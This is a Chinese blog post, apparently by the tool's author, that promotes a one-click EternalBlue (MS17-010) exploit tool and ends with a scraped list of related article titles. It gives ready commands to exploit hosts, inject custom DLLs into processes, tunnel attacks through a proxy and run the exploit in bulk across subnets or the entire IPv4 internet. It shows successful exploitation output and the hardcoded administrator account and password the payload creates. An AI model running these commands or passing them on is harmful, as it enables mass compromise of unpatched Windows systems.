漏洞简介

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

漏洞检测

无损检测,不会对目标造成任何危害,大家无需担心

Ladon 192.168.1.8 MS17010
Ladon 192.168.1.8/24 MS17010
Ladon 192.168.1.8/c MS17010

检测发现存在漏洞高亮显示

独立使用

只需提供IP或IP列表即可自动利用永恒之蓝,当然也可以使用Ladon来批量甚至全网

PS: 由于当时漏洞影响很大,所以并未放出一键批量工具,现在4年过去了,还没打补丁就只能建议开除维护人员了,工具调用的是NSA原版的EXP,所以整个SMBSCAN目录里的文件基本上都是被杀的,这就不方便集成在Ladon里,以免Ladon被所有杀软杀。

C:\Users\k8gege\Desktop\SmbExp>ksmb 192.168.1.89
MS17010-EXP ETERNALBLUE by K8gegeIP:  192.168.1.89
OS:  64-bit 6.1 build 7601     Windows 2008 R2 Enterprise 7601 SP 1
VUL: 3 (ETERNALBLUE     - DANE  ETERNALROMANCE  - FB    ETERNALCHAMPION - DANE/F
B)
EXP: Use Eternalblue & Doublepulsar
DLL: x64 Payload Injected

只IP默认445端口

ksmb 192.168.1.89

自定义端口

ksmb 192.168.1.89 445
适用于代理出来打,不用考虑做免杀,而且免杀一堆文件也很麻烦

自定义DLL

ksmb 192.168.1.89 445 mydll.dll

注入指定进程

ksmb 192.168.1.89 445 mydll.dll explorer.exe

Ladon调用

使用Ladon可轻松批量使用自己的POC,即只需要实现一个功能,剩下交给Ladon,不用每次来什么新洞都得浪费时间写批量利用工具。除了花一堆时间调式EXP,还得把它弄成批量,批量又得考虑多线程是否兼容POC里的代码等等问题,等写完时效性都过了。Ladon可批量主机、批量URL、批量网段、全网等等,非常方便,下面就是调用ms17010exp的例子。

C:\Users\k8gege\Desktop\SmbExp>Ladon 192.168.1.89 ksmb.exe
Ladon 7.5
Start: 2020-12-17 23:40:16
Runtime: .net 2.0  ME: x64 OS: x64
OS Name: Microsoft Windows 8.1 Enterprise
RunUser: k8gege PR: -IsUser
PID: 5804  CurrentProcess: LadonCall DiyMoudle (c# exe)
load ksmb.exe
ICMP: 192.168.1.89      00-0C-29-CF-FE-E1       VMware
MS17010-EXP ETERNALBLUE by K8gegeIP:  192.168.1.89
OS:  64-bit 6.1 build 7601     Windows 2008 R2 Enterprise 7601 SP 1
VUL: 3 (ETERNALBLUE     - DANE  ETERNALROMANCE  - FB    ETERNALCHAMPION - DANE/F
B)
EXP: Use Eternalblue & Doublepulsar
DLL: x64 Payload Injected

批量利用

Ladon 192.168.1.89/c ksmb.exe
Ladon 192.168.1.89/24 ksmb.exe

全网扫描

Ladon 0.0.0.0-255.255.255.255 ksmb.exe

成功结果

自带DLL会添加以下管理员用户
k8ms17010exp K8gege520!@#

可替换DLL,执行自定义功能

下载

EXP小密圈内下载

〖EXP〗NSA MS17010永恒之蓝一键工具相关推荐

  1. Win7利用NSA Eternalblue 永恒之蓝 和fuzzbunch工具实现dll注入 Win 7 64CN

    Win7利用NSA Eternalblue 永恒之蓝 和fuzzbunch工具实现dll注入 Win 7 64CN 一.原理 1.Eternalblue可以利用SMB漏洞,结合Doublepulsar ...

  2. MSF之ms17-010永恒之蓝漏洞利用

    MSF之ms17-010永恒之蓝漏洞利用 准备 扫描漏洞 漏洞攻击 准备 实验准备环境: 被攻击机:虚拟机win7x64位系统,其IP为:10.101.2.11(关闭了防火墙) 攻击机:虚拟机kali ...

  3. MS17-010(永恒之蓝)漏洞复现和分析

    MS17-010(永恒之蓝)漏洞复现和分析 一.漏洞简介 1.永恒之蓝介绍: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含&q ...

  4. 【网络安全】MS17-010“永恒之蓝”漏洞的利用

    导语 最近学期末进行网络安全实训,老师要求每个小组选择一个方向进行研究,本篇将讲述"永恒之蓝"漏洞的简单利用. 一.实验原理 Eternalblue通过TCP端口445和139来利 ...

  5. Windows 7 ms17-010永恒之蓝漏洞复现

    Windows 7 ms17-010永恒之蓝漏洞复现 复现ms17-010漏洞环境: VMware Workstation : 攻击机:Kali-Linux : 靶机:Windows 7 : 使用步骤 ...

  6. 使用ms17-010永恒之蓝漏洞对win7进行渗透

    使用ms17-010永恒之蓝漏洞对win7进行渗透 一.实验目的: 利用ms17-010永恒之蓝漏洞对win7进行渗透: 利用enable_rdp脚本开启远程桌面并创建用户: 关闭主机UAC防护策略并 ...

  7. MS17-010 “永恒之蓝“ 修复方案

    一.预防 1.为计算机安装最新的安全补丁,微软已发布补丁MS17-010修复了"永恒之蓝"攻击的系统漏洞,请尽快安装此安全补丁,网址为Microsoft 安全公告 MS17-010 ...

  8. MS17-010永恒之蓝漏洞的简谈与利用

    MS17-010是一个安全类型的补丁. MS17-010更新修复了 Microsoft Windows中的漏洞. 如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特 ...

  9. MS17-010永恒之蓝-漏洞利用+修复方法

    前言 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生. 该病毒是不法分子利用NSA(National Security Agenc ...

  10. ”NSA武器库-永恒之蓝“与“Wannacry蠕虫勒索软件”的双剑合璧

    5月12日起,大规模勒索病毒软件在全球蔓延,我国大量行业企业内网受到攻击,教育网受损严重,据悉,大量学校电脑感染勒索病毒,重要文件被加密. 这是不法分子利用NSA黑客武器库泄露的"永恒之蓝& ...

最新文章

  1. 与应用程序松耦合的报表开发组织
  2. 成功解决ValueError: cannot assign without a target object
  3. ###STL学习--标准模板库
  4. display:none;与visibility:hidden;的区别
  5. LeetCode 1685. 有序数组中差绝对值之和(前缀和)
  6. 求年龄和的c语言数据类型,第1章 c语言与数据类型.ppt
  7. golang之终端操作,文件操作
  8. rollup配置及使用
  9. Java将每半年发布一个版本
  10. 解决表格td宽度设置失效问题
  11. bigdecimal取小数部分_无限小数的本质
  12. 蜀道难于上青天 四川盆地DEM数据下载
  13. 着色近似算法——韦尔奇-鲍威尔(Welch-Powell)点着色算法
  14. PS 在PS中如何等比例放大缩小图片
  15. 中小学生计算机编程笔试,计算机编程笔试题
  16. xp系统怎么创建服务器新用户,xp系统ftp服务器创建用户
  17. 四、vue 项目使用高德地图画面(多边形)
  18. 史上最简单的图像识别-百度AI开放平台
  19. 2012意大利之行1:从深圳到罗马_我是亲民_新浪博客
  20. Day 32 - 透过手机呼叫 Amazon API Gateway 上传图片到 S3

热门文章

  1. 隐藏播放器html代码大全,播放器代码大全
  2. 迅雷修改tracker服务器,qBittorrent 添加自定义 Tracker 的方法
  3. MD5及pack安装
  4. Netty 基本原理
  5. css3多变形,CSS3 clip-path polygon图形构建与动画变换二三事
  6. steam服务器102修复,steam平台102代码错误怎么办 解决steam错误代码102图文教程
  7. Robo 3T显示MongoDB数据时区晚8小时问题
  8. Java使用RXTX读取串口
  9. QQ查看撤回的语音消息,slk 文件转 mp3
  10. 系统集成项目管理工程师14真题解析